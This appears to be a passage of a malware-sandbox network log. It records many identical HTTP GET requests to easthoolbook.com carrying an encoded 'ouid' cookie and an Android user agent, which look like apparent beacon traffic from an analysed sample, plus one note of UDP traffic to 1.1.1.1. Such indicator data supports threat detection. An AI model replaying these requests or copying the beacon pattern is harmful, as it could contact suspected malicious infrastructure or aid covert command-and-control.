Source: global traffic	HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
